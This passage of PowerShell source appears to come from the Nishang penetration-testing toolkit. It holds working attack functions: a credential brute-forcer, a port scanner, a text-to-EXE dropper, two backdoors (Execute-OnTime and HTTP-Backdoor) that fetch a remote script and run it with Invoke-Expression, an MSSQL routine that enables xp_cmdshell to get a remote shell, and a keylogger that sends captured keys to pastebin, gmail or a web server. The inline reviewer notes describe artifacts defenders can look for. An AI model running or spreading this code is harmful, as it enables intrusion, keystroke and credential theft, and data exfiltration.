                            # ValidateCredentials returns $false for a wrong password rather than
                            # throwing, so the Catch below mostly covers connectivity errors.
                            # Every failed attempt counts towards the account's lockout threshold.
                            $success = $principalContext.ValidateCredentials($username, $password)
                            $message = "Password Match"
                            if ($success -eq $true)
                            {
                                Write-Output "Match found! $username : $Password"
                                if ($StopOnSuccess)
                                {
                                    break UsernameLoop
                                }
                            }
                        }
                        Catch
                        {
                            $success = $false
                            $message = "Password doesn't match"
                        }
                    }
                }
            }
        }
        #Brute Force Web
        elseif ($service -eq "Web")
        {
            if ($ComputerName -notMatch "^(http|https)://")
            {
                $source = "http://" + $ComputerName
            }
            else
            {
                $source = $ComputerName
            }
            :UsernameLoop foreach ($username in $usernames)
            {
                foreach ($Password in $Passwords)
                {
                    $webClient = New-Object Net.WebClient
                    $securePassword = ConvertTo-SecureString -AsPlainText -String $password -Force
                    $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userName, $securePassword
                    $webClient.Credentials = $credential
                    Try
                    {
                        Write-Verbose "Checking $userName : $password"
                        # NOTE(review): the three bare expressions below write $source, the
                        # full page body and $true to the output stream on every attempt,
                        # interleaved with the "Match found!" lines. A URL that does not
                        # actually require authentication will report every pair as a match.
                        $source
                        $webClient.DownloadString($source)
                        $success = $true
                        $success
                        if ($success -eq $true)
                        {
                            Write-Output "Match found! $Username : $Password"
                            if ($StopOnSuccess)
                            {
                                break UsernameLoop
                            }
                        }
                    }
                    Catch
                    {
                        $success = $false
                        $message = "Password doesn't match"
                    }
                }
            }
        }
    }
}
1775
1776
1777
1778#########################################Scan IP-Addresses, Ports and HostNames############################################################
1779####Thanks Niklas Goude#####
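function Invoke-PortScan {

<#
.SYNOPSIS
Nishang payload which scans IP addresses, ports and host names.

.DESCRIPTION
Sweeps the given address range with ICMP echo requests and, for every host that
replies, optionally resolves its reverse DNS (PTR) name and/or attempts a TCP
connect on each port in -Ports. Hosts that do not answer the ping are never
port-scanned or reported.

Addresses are walked octet by octet, each octet from its start to its end value.
A range that crosses more than one /24 therefore only visits the last-octet
values between StartAddress and EndAddress inside every subnet, not every
address in between.

.PARAMETER StartAddress
First address of the range (dotted decimal).

.PARAMETER EndAddress
Last address of the range (dotted decimal).

.PARAMETER ResolveHost
Resolve the reverse DNS name of each live host.

.PARAMETER ScanPort
Attempt a TCP connect to each port in -Ports on each live host.

.PARAMETER Ports
Ports that should be scanned, default values are: 21,22,23,53,69,71,80,98,110,139,111,
389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,
5801,5900,5555,5901

.PARAMETER TimeOut
Time (in milliseconds) to wait for the ping reply and for each TCP connect,
default 100. A connect that has not completed inside this window is reported as
closed, so raise it on slow links.

.EXAMPLE
Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254

.EXAMPLE
Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost

.EXAMPLE
Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort

.EXAMPLE
Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500

.EXAMPLE
Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80

.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
https://github.com/samratashok/nishang

.NOTES
Goude 2012, TrueSec
#>


[CmdletBinding()] Param(
    [parameter(Mandatory = $true,
    Position = 0)]
    [ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
    [string]$StartAddress,
    [parameter(Mandatory = $true,
    Position = 1)]
    [ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
    [string]$EndAddress,
    [switch]$ResolveHost,
    [switch]$ScanPort,
    [int[]]$Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901),
    [int]$TimeOut = 100
    )

    Begin {
        $ping = New-Object System.Net.Networkinformation.Ping
        # Split the octets once rather than on every loop iteration.
        $startOctets = $StartAddress.Split(".")
        $endOctets = $EndAddress.Split(".")
    }
    Process {
        foreach($a in ($startOctets[0]..$endOctets[0])) {
            foreach($b in ($startOctets[1]..$endOctets[1])) {
                foreach($c in ($startOctets[2]..$endOctets[2])) {
                    foreach($d in ($startOctets[3]..$endOctets[3])) {
                        $address = "$a.$b.$c.$d"
                        write-progress -activity PingSweep -status $address -percentcomplete (($d/($endOctets[3])) * 100)
                        # A failed Send (no route, missing raw-socket privilege, ...) must not
                        # leave the previous host's reply in $pingStatus, or that host would be
                        # reported again under this address.
                        $pingStatus = $null
                        try {
                            $pingStatus = $ping.Send($address,$TimeOut)
                        }
                        catch {
                            Write-Verbose "Ping to $address failed: $($_.Exception.Message)"
                        }
                        if($pingStatus -ne $null -and $pingStatus.Status -eq "Success") {
                            # Reset per host: these are only assigned in the optional branches
                            # below, and a value left over from the previous host (e.g. after a
                            # failed reverse lookup) would otherwise be reported here.
                            $hostName = $null
                            $openPorts = $null
                            $getHostEntry = $null
                            if($ResolveHost) {
                                write-progress -activity ResolveHost -status $address -percentcomplete (($d/($endOctets[3])) * 100) -Id 1
                                # Start the reverse lookup now so it overlaps with the port scan.
                                $getHostEntry = [Net.DNS]::BeginGetHostEntry($pingStatus.Address, $null, $null)
                            }
                            if($ScanPort) {
                                $openPorts = @()
                                for($i = 1; $i -le $ports.Count;$i++) {
                                    $port = $Ports[($i-1)]
                                    write-progress -activity PortScan -status $address -percentcomplete (($i/($Ports.Count)) * 100) -Id 2
                                    $client = New-Object System.Net.Sockets.TcpClient
                                    try {
                                        $null = $client.BeginConnect($pingStatus.Address,$port,$null,$null)
                                        if(-not $client.Connected) {
                                            # Give the asynchronous connect up to $TimeOut ms to finish.
                                            Start-Sleep -Milliseconds $TimeOut
                                        }
                                        if($client.Connected) {
                                            $openPorts += $port
                                        }
                                    }
                                    catch {
                                        # Refused / unreachable: treat as closed and keep scanning.
                                        Write-Verbose "Connect to ${address}:$port failed: $($_.Exception.Message)"
                                    }
                                    finally {
                                        # Always release the socket, even when BeginConnect threw.
                                        $client.Close()
                                    }
                                }
                            }
                            if($getHostEntry -ne $null) {
                                try {
                                    $hostName = ([Net.DNS]::EndGetHostEntry([IAsyncResult]$getHostEntry)).HostName
                                }
                                catch {
                                    # No PTR record or DNS failure: report an empty HostName instead
                                    # of aborting the sweep or reusing the previous host's name.
                                    Write-Verbose "Reverse lookup of $address failed: $($_.Exception.Message)"
                                }
                            }
                            # Return Object
                            New-Object PSObject -Property @{
                                IPAddress = $address;
                                HostName = $hostName;
                                Ports = $openPorts
                            } | Select-Object IPAddress, HostName, Ports
                        }
                    }
                }
            }
        }
    }
    End {
    }
}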
1901
1902############################################################Convert a plain string to Base64 encoding.####################################
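function StringtoBase64
{


<#
.SYNOPSIS
Helper function which encodes a string, or the contents of a file, to a base64 string.

.DESCRIPTION
Encodes the input as UTF-16LE (the encoding powershell.exe -EncodedCommand expects),
base64-encodes the bytes and writes the result to a file. By default the output goes
to base64encoded.txt in the current directory.

.PARAMETER Str
The string to be encoded, or -- without -IsString -- the path of a file whose entire
contents are encoded. File contents are read verbatim, so line breaks are preserved.

.PARAMETER OutputFile
The path of the output file. Default is "base64encoded.txt" in the current working directory.

.PARAMETER IsString
Use this to specify that Str is a literal string rather than a file path.

.EXAMPLE
PS > StringToBase64 "start-process calc.exe" -IsString

.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>


    [CmdletBinding()]
    Param( [Parameter(Position = 0, Mandatory = $False)]
        [String]
        $Str,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $outputfile=".\base64encoded.txt",

        [Switch]
        $IsString
    )

    if ($IsString)
    {
        $plain = $Str
    }
    else
    {
        # Read the whole file as one string. The previous Get-Content call yielded
        # one string per line, so a multi-line file did not reach GetBytes as its
        # original text and line breaks were lost -- fatal for script files, where a
        # '#' comment then swallows everything that followed it.
        # Resolve through the provider so a relative path follows $PWD rather than
        # the process working directory.
        $inPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Str)
        $plain = [System.IO.File]::ReadAllText($inPath)
    }

    $utfbytes = [System.Text.Encoding]::Unicode.GetBytes($plain)
    $base64string = [System.Convert]::ToBase64String($utfbytes)
    Out-File -InputObject $base64string -Encoding ascii -FilePath "$outputfile"
    Write-Output "Encoded data written to file $outputfile"
}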
1959
1960
1961
1962
####################################Convert an executable stored as space-separated decimal byte values (ExetoText output) back to an executable (.exe)########################################
1964
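function TexttoEXE
{

<#
.SYNOPSIS
Function to convert a PE file stored as text back into an executable.

.DESCRIPTION
Reads a text file containing space-separated decimal byte values (the format
written by ExetoText) and writes those bytes to the given path. The "hex"
wording in older comments is historical; the input is decimal.

.PARAMETER Filename
Path of the text file from which executable will be created. Relative paths are
resolved against the current PowerShell location.

.PARAMETER EXE
Path where the executable should be created. Relative paths are resolved against
the current PowerShell location (not the process working directory, which .NET
static methods would otherwise use).

.EXAMPLE
PS > TexttoExe C:\evil.text C:\exe\evil.exe

.LINK
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
https://github.com/samratashok/nishang
#>


    [CmdletBinding()] Param (
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $FileName,

        [Parameter(Position = 1, Mandatory = $True)]
        [String]$EXE
    )

    $inPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($FileName)
    $outPath = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($EXE)

    [String]$dump = [System.IO.File]::ReadAllText($inPath)

    # Split on any run of whitespace (spaces, CR/LF) and drop empty tokens: a
    # trailing space or newline would otherwise be coerced to a spurious 0x00
    # byte (PowerShell converts "" to 0), corrupting the rebuilt PE.
    $tokens = @($dump -split '\s+' | Where-Object { $_ -ne '' })
    [Byte[]] $bytes = @($tokens | ForEach-Object { [byte]$_ })
    [System.IO.File]::WriteAllBytes($outPath, $bytes)
    Write-Output "Executable written to file $EXE"
}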
2004
2005
2006
2007#############################################Waits till given time to execute a script.####################################################
function Execute-OnTime
{

<#
.SYNOPSIS
Payload which waits till given time to execute a script.

.DESCRIPTION
This payload waits till the given time (on the victim) and then downloads a PowerShell script and executes it.

Detection / risk notes: the payload fetches CheckURL over HTTP(S) roughly every 5 seconds
for as long as it runs, and at the trigger time fetches PayloadURL and passes the response
body straight to Invoke-Expression -- no signature or integrity check. Whoever controls
those URLs (or can intercept them, over plain http) controls the host.

.PARAMETER PAYLOADURL
The URL from where the file would be downloaded.

.PARAMETER Arguments
Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.

.PARAMETER time
The Time when the payload will be executed (in 24 hour format e.g. 23:21). It is compared as a
regular expression against the current HH:MM, so a partial value such as "1:2" also matches 11:23.

.PARAMETER CheckURL
The URL which the payload would check for instructions to stop.

.PARAMETER StopString
The string which if found at CheckURL will stop the payload. Compared with -eq, so the
served file must contain exactly this string (no trailing newline).

.EXAMPLE
PS > Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload

.EXAMPLE
PS > Execute-OnTime -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -Time hh:mm -CheckURL http://pastebin.com/raw.php?i=Zhyf8rwh -StopString stoppayload | Do-Exfiltration -ExfilOption gmail -username <> -Password <>

Use above command for data exfiltration to gmail


.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>



    [CmdletBinding()] Param(

        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $PayloadURL,

        # NOTE(review): Mandatory = $True means the "Out-Null" default is never applied;
        # the sentinel check below only fires if the caller passes "Out-Null" explicitly.
        [Parameter(Position = 1, Mandatory = $True)]
        [String]
        $Arguments = "Out-Null",


        [Parameter(Position = 2, Mandatory = $True)]
        [String]
        $time,

        [Parameter(Position = 3, Mandatory = $True)]
        [String]
        $CheckURL,

        [Parameter(Position = 4, Mandatory = $True)]
        [String]
        $StopString

    )



    while($true)
    {
        $exec = 0
        start-sleep -seconds 5
        $webclient = New-Object System.Net.WebClient
        # Fetched on every iteration (one HTTP request every ~5 s) but only acted
        # upon in the elseif below, i.e. when the time does not match.
        $filecontent = $webclient.DownloadString("$CheckURL")
        # %R = 24-hour HH:MM in the victim's local time.
        $systime = Get-Date -UFormat %R
        if ($systime -match $time)
        {
            # Downloads and runs the remote script (typically it only defines functions) ...
            $pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
            # Check for arguments to the downloaded script.
            # ... then runs $Arguments (e.g. a function name) as a second expression.
            if ($Arguments -ne "Out-Null")
            {
                $pastevalue = Invoke-Expression $Arguments
            }
            $pastevalue
            $exec++
            # $exec is reset at the top of every iteration, so this always sleeps 60 s
            # after a run, pushing the next check past the matching minute so the
            # payload does not execute again within the same HH:MM.
            if ($exec -eq 1)
            {
                Start-Sleep -Seconds 60
            }
        }
        # NOTE(review): the loop does not end on its own after the payload has run; it
        # keeps polling (and will fire again at the same time on following days) until
        # CheckURL serves exactly $StopString.
        elseif ($filecontent -eq $StopString)
        {
            break
        }
    }
}
2104
2105
2106
2107####################################################Execute commands remotely on a MS SQL server.##############################################
function Execute-Command-MSSQL
{

<#
.SYNOPSIS
Payload which could be used to execute commands remotely on a MS SQL server.

.DESCRIPTION
This payload needs a valid administrator username and password on remote SQL server.
It uses the credentials to enable xp_cmdshell and provides a powershell shell, a sql shell
or a cmd shell on the target.

Note for reviewers/defenders: xp_cmdshell is switched on server-wide via sp_configure and is
never switched back off by this function, so the configuration change outlives the session.
The credentials are placed in clear text in the ADO.NET connection string (SQL authentication).

.PARAMETER ComputerName
Enter ComputerName or IP Address of the target SQL server.

.PARAMETER UserName
Enter a UserName for a SQL server administrator account.

.PARAMETER Password
Enter the Password for the account.

.EXAMPLE
Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234

.EXAMPLE
Execute-Command-MSSQL -ComputerName 192.168.1.10 -UserName sa -Password sa1234

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang

.NOTES
Based mostly on the Get-TSSqlSysLogin by Niklas Goude and accompanying blog post at
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
http://www.truesec.com

#>

 [CmdletBinding()] Param(
 [Parameter(Mandatory = $true, Position = 0, ValueFromPipeLine= $true)]
 [Alias("PSComputerName","CN","MachineName","IP","IPAddress")]
 [string]
 $ComputerName,

 [parameter(Mandatory = $true, Position = 1)]
 [string]
 $UserName,

 [parameter(Mandatory = $true, Position = 2)]
 [string]
 $Password
 )
Try{
 # Opens a fresh connection, runs one query and closes the connection.
 # The reader is never consumed, so any result set is discarded.
 function Make-Connection ($query){

 $Connection = New-Object System.Data.SQLClient.SQLConnection
 $Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
 $Connection.Open()
 $Command = New-Object System.Data.SQLClient.SQLCommand
 $Command.Connection = $Connection
 $Command.CommandText = $query
 $Reader = $Command.ExecuteReader()
 $Connection.Close()

 }

 "Connecting to $ComputerName..."
 start-sleep 3
 # Both sp_configure changes are persistent server settings; SQL Server
 # records configuration changes in its error log, which is the place a
 # defender would look for this activity.
 Make-Connection "EXEC sp_configure 'show advanced options',1; RECONFIGURE;"
 "`nEnabling XP_CMDSHELL...`n"
 start-sleep 3
 Make-Connection "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
 write-host -NoNewline "Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): "
 $shell = read-host
 # $payload is unset on the first pass, so the loop always runs at least once;
 # it ends when the operator types "exit" at any of the prompts.
 while($payload -ne "exit")
 {
 $Connection = New-Object System.Data.SQLClient.SQLConnection
 $Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
 $Connection.Open()
 $Command = New-Object System.Data.SQLClient.SQLCommand
 $Command.Connection = $Connection
 if ($shell -eq "P")
 {
 write-host "`n`nStarting PowerShell on the target..`n"
 write-host -NoNewline "PS $ComputerName> "
 $payload = read-host
 # Each command is a child powershell.exe of the SQL Server service process.
 $cmd = "EXEC xp_cmdshell 'powershell.exe -Command `"& {$payload}`"'"
 }
 elseif ($shell -eq "S")
 {
 write-host "`n`nStarting SQL shell on the target..`n"
 write-host -NoNewline "MSSQL $ComputerName> "
 $payload = read-host
 # Raw T-SQL, sent as typed.
 $cmd = $payload
 }
 elseif ($shell -eq "C")
 {
 write-host "`n`nStarting cmd shell on the target..`n"
 write-host -NoNewline "CMD $ComputerName> "
 $payload = read-host
 $cmd = "EXEC xp_cmdshell 'cmd.exe /K $payload'"
 }


 # If $shell was none of P/S/C, $cmd is still unset and an empty batch is sent.
 $Command.CommandText = "$cmd"
 $Reader = $Command.ExecuteReader()
 # Only column 0 of each row is surfaced (xp_cmdshell returns one text column).
 while ($reader.Read()) {
 New-Object PSObject -Property @{
 Name = $reader.GetValue(0)
 }
 }
 $Connection.Close()
 }
 }
 Catch {
 # Best-effort: the most recent error record is emitted and the function returns.
 $error[0]
 }
}
2226
2227
function HTTP-Backdoor
{

<#
.SYNOPSIS
Payload which queries a URL for instructions and then downloads and executes a powershell script.

.DESCRIPTION
This payload queries the given URL and after a suitable command (given by MagicString variable) is found,
it downloads and executes a powershell script. The payload could be stopped remotely if the string at CheckURL matches
the string given in StopString variable.

The loop is the same shape as Execute-OnTime: a GET to CheckURL every 5 seconds, and when the trigger
matches, the PayloadURL body is run through Invoke-Expression in the current process.

.PARAMETER CheckURL
The URL which the payload would query for instructions.

.PARAMETER PayloadURL
The URL from where the powershell script would be downloaded.

.PARAMETER Arguments
Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.

.PARAMETER MagicString
The string which would act as an instruction to the payload to proceed with download and execute.

.PARAMETER StopString
The string which if found at CheckURL will stop the payload.

.Example

PS > HTTP-Backdoor

The payload will ask for all required options.

.EXAMPLE
PS > HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis

Use above when using the payload from non-interactive shells.

.EXAMPLE
PS > HTTP-Backdoor -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -PayloadURL http://pastebin.com/raw.php?i=Zhyf8rwh -Arguments Get-Information -MagicString start123 -StopString stopthis | Do-Exfiltration -ExfilOption DNS -DomainName example.com -AuthNS 192.168.254.228

Use above command for data exfiltration to a DNS server which logs TXT queries.


.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>


 [CmdletBinding()] Param(

 [Parameter(Position = 0, Mandatory = $True)]
 [String]
 $CheckURL,

 [Parameter(Position = 1, Mandatory = $True)]
 [String]
 $PayloadURL,

 [Parameter(Position = 2, Mandatory = $False)]
 [String]
 $Arguments = "Out-Null",

 [Parameter(Position = 3, Mandatory = $True)]
 [String]
 $MagicString,

 [Parameter(Position = 4, Mandatory = $True)]
 [String]
 $StopString
 )

 # Beacon loop. Observable behaviour: an HTTP GET to CheckURL every 5 s,
 # a second GET to PayloadURL on trigger, then in-process execution of the
 # downloaded text. The whole CheckURL body must equal MagicString (-eq),
 # it is not a substring match.
 while($true)
 {
 # Reset each iteration; "-eq 1" below is therefore true after every run.
 $exec = 0
 start-sleep -seconds 5
 $webclient = New-Object System.Net.WebClient
 $filecontent = $webclient.DownloadString("$CheckURL")
 if($filecontent -eq $MagicString)
 {
 $pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
 # Check for arguments to the downloaded script.
 if ($Arguments -ne "Out-Null")
 {
 $pastevalue = Invoke-Expression $Arguments
 }
 $pastevalue
 $exec++
 if ($exec -eq 1)
 {
 # Back off for a minute after each execution.
 Start-Sleep -Seconds 60
 }
 }
 # Stop check only runs on iterations where the trigger did not match.
 elseif ($filecontent -eq $StopString)
 {
 break
 }
 }

}
2329
2330#############################################Logs the keys in the context of current user.#################################################
function Keylogger
{

<#
.SYNOPSIS
Payload which logs keys.

.DESCRIPTION
This payload logs a user's keys and writes them to file key.log (I know its bad :|) in user's temp directory.
Saved keys could then be decoded using the Parse_Key script.

Reviewer notes: the work runs in background jobs (Start-Job) seeded with the $functions script block below.
Keylog polls GetAsyncKeyState via an Add-Type P/Invoke every 40 ms and appends to $env:temp\key.log;
Keypaste (only with -exfil) re-reads that file every 5 s and sends it out by the chosen channel.
Both jobs re-fetch CheckURL on a counter (6000 iterations) and stop when its content equals MagicString.
Host-side artifacts a defender can look for: the key.log file in the user temp directory, the runtime
Add-Type compilation, nslookup child processes for the DNS option, and the outbound SMTP/HTTP traffic.

.PARAMETER CheckURL
The URL which would contain the MagicString used to stop keylogging.

.PARAMETER MagicString
The string which when found at CheckURL will stop the keylogger.

.EXAMPLE
PS > Keylogger
The payload will ask for all required options.

.EXAMPLE
PS > Keylogger http://example.com stopthis
Use above when using the payload from non-interactive shells or you don't want the payload to ask for any options.

.EXAMPLE
PS > Keylogger http://example.com stopthis -exfil <dev_key> <username> <pass> 2
Use above when using the payload from non-interactive shells. This will exfiltrate keys to gmail.


.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>

 [CmdletBinding(DefaultParameterSetName="noexfil")] Param(
 # Declared but never read anywhere in this function.
 [Parameter(Parametersetname="exfil")]
 [Switch]
 $persist,

 [Parameter(Parametersetname="exfil")]
 [Switch]
 $exfil,

 [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
 [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
 [String]
 $CheckURL,

 [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
 [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
 [String]
 $MagicString,

 [Parameter(Position = 2, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
 [String]
 $ExfilOption,

 [Parameter(Position = 3, Mandatory = $False, Parametersetname="exfil")]
 [String]
 $dev_key = "null",

 [Parameter(Position = 4, Mandatory = $False, Parametersetname="exfil")]
 [String]
 $username = "null",

 [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")]
 [String]
 $password = "null",

 [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
 [String]
 $URL = "null",

 [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
 [String]
 $DomainName = "null",

 [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
 [String]
 $AuthNS = "null"

 )

# Script block handed to Start-Job as -InitializationScript: it defines the
# two worker functions inside each job's runspace. Nothing here runs in the
# caller's session.
$functions = {

# Worker 1: key-state poller. Writes one token per key press to key.log.
function Keylog
{
 Param (
 [Parameter(Position = 0, Mandatory = $True)]
 [String]
 $MagicString,

 [Parameter(Position = 1, Mandatory = $True)]
 [String]
 $CheckURL
 )

 # P/Invoke shim compiled at runtime; the Add-Type call is itself an
 # observable event (in-memory C# compilation).
 $signature = @"
 [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
 public static extern short GetAsyncKeyState(int virtualKeyCode);
"@
 $getKeyState = Add-Type -memberDefinition $signature -name "Newtype" -namespace newnamespace -passThru
 $check = 0
 while ($true)
 {
 # 40 ms x 6000 iterations = roughly four minutes between CheckURL polls.
 Start-Sleep -Milliseconds 40
 $logged = ""
 $result=""
 $shift_state=""
 $caps_state=""
 # Scan every virtual-key code 1..254 on each tick.
 for ($char=1;$char -le 254;$char++)
 {
 $vkey = $char
 $logged = $getKeyState::GetAsyncKeyState($vkey)
 # -32767 (0x8001) is the "pressed since last call" state for a currently held key.
 if ($logged -eq -32767)
 {
 # Digits: prefix "S-" when either shift key (VK 160/161) is down.
 if(($vkey -ge 48) -and ($vkey -le 57))
 {
 $left_shift_state = $getKeyState::GetAsyncKeyState(160)
 $right_shift_state = $getKeyState::GetAsyncKeyState(161)
 if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
 {
 $result = "S-" + $vkey
 }
 else
 {
 $result = $vkey
 }
 }
 # Letters (and VK 64): shift state combined with Caps Lock via -xor.
 elseif(($vkey -ge 64) -and ($vkey -le 90))
 {
 $left_shift_state = $getKeyState::GetAsyncKeyState(160)
 $right_shift_state = $getKeyState::GetAsyncKeyState(161)
 $caps_state = [console]::CapsLock
 if(!(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768)) -xor $caps_state)
 {
 $result = "S-" + $vkey
 }
 else
 {
 $result = $vkey
 }
 }
 # OEM punctuation ranges: shift prefix only.
 elseif((($vkey -ge 186) -and ($vkey -le 192)) -or (($vkey -ge 219) -and ($vkey -le 222)))
 {
 $left_shift_state = $getKeyState::GetAsyncKeyState(160)
 $right_shift_state = $getKeyState::GetAsyncKeyState(161)
 if(($left_shift_state -eq -32768) -or ($right_shift_state -eq -32768))
 {
 $result = "S-" + $vkey
 }
 else
 {
 $result = $vkey
 }
 }
 else
 {
 $result = $vkey
 }
 # $now is computed but not written to the log line.
 $now = Get-Date;
 $logLine = "$result "
 # Fixed on-disk artifact: %TEMP%\key.log, appended on every key press.
 $filename = "$env:temp\key.log"
 Out-File -FilePath $fileName -Append -InputObject "$logLine"

 }
 }
 $check++
 if ($check -eq 6000)
 {
 # Kill-switch poll: whole body of CheckURL must equal MagicString.
 $webclient = New-Object System.Net.WebClient
 $filecontent = $webclient.DownloadString("$CheckURL")
 if ($filecontent -eq $MagicString)
 {
 break
 }
 $check = 0
 }
 }
}


 # Worker 2: reads key.log every 5 s and sends its content by $ExfilOption.
 # $filename, $DomainName and $Data are referenced below but are not
 # parameters of this function; they resolve (or not) from the job's scope.
 function Keypaste
 {
 Param (
 [Parameter(Position = 0, Mandatory = $True)]
 [String]
 $ExfilOption,

 [Parameter(Position = 1, Mandatory = $True)]
 [String]
 $dev_key,

 [Parameter(Position = 2, Mandatory = $True)]
 [String]
 $username,

 [Parameter(Position = 3, Mandatory = $True)]
 [String]
 $password,

 [Parameter(Position = 4, Mandatory = $True)]
 [String]
 $URL,

 [Parameter(Position = 5, Mandatory = $True)]
 [String]
 $AuthNS,

 [Parameter(Position = 6, Mandatory = $True)]
 [String]
 $MagicString,

 [Parameter(Position = 7, Mandatory = $True)]
 [String]
 $CheckURL
 )

 $check = 0
 while($true)
 {
 # $read is reset every iteration, so the "-eq 30" truncation below never fires
 # and key.log is never cleared by this worker.
 $read = 0
 Start-Sleep -Seconds 5
 $pastevalue=Get-Content $env:temp\key.log
 $read++
 if ($read -eq 30)
 {
 Out-File -FilePath $env:temp\key.log -Force -InputObject " "
 $read = 0
 }
 $now = Get-Date;
 $name = $env:COMPUTERNAME
 # Label is "<hostname> : <UTC timestamp>"; note the later code reads $pastename (no underscore).
 $paste_name = $name + " : " + $now.ToUniversalTime().ToString("dd/MM/yyyy HH:mm:ss:fff")
 # Synchronous form-encoded POST over MSXML; the response body is kept in
 # $script:session_key for the pastebin login flow.
 function post_http($url,$parameters)
 {
 $http_request = New-Object -ComObject Msxml2.XMLHTTP
 $http_request.open("POST", $url, $false)
 $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
 $http_request.setRequestHeader("Content-length", $parameters.length);
 $http_request.setRequestHeader("Connection", "close")
 $http_request.send($parameters)
 $script:session_key=$http_request.responseText
 }

 # Joins $pastevalue with newlines, GZips it and returns base64 text.
 function Compress-Encode
 {
 #Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
 $encdata = [string]::Join("`n", $pastevalue)
 $ms = New-Object System.IO.MemoryStream
 $cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
 $sw = New-Object System.IO.StreamWriter($cs)
 $sw.Write($encdata)
 $sw.Close();
 $Compressed = [Convert]::ToBase64String($ms.ToArray())
 $Compressed
 }

 # Channel 1: pastebin API (login, then private paste). Credentials go in the POST body.
 if ($exfiloption -eq "pastebin")
 {
 $utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
 $pastevalue = [System.Convert]::ToBase64String($utfbytes)
 post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
 post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
 }

 # Channel 2: self-addressed mail through smtp.gmail.com with TLS.
 elseif ($exfiloption -eq "gmail")
 {
 #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
 $smtpserver = "smtp.gmail.com"
 $msg = new-object Net.Mail.MailMessage
 $smtp = new-object Net.Mail.SmtpClient($smtpServer )
 $smtp.EnableSsl = $True
 $smtp.Credentials = New-Object System.Net.NetworkCredential("$username", "$password");
 $msg.From = "$username@gmail.com"
 $msg.To.Add("$username@gmail.com")
 $msg.Subject = $pastename
 $msg.Body = $pastevalue
 if ($filename)
 {
 $att = new-object Net.Mail.Attachment($filename)
 $msg.Attachments.Add($att)
 }
 $smtp.Send($msg)
 }

 # Channel 3: compressed+base64 blob POSTed to $URL.
 elseif ($exfiloption -eq "webserver")
 {
 $Data = Compress-Encode
 post_http $URL $Data
 }
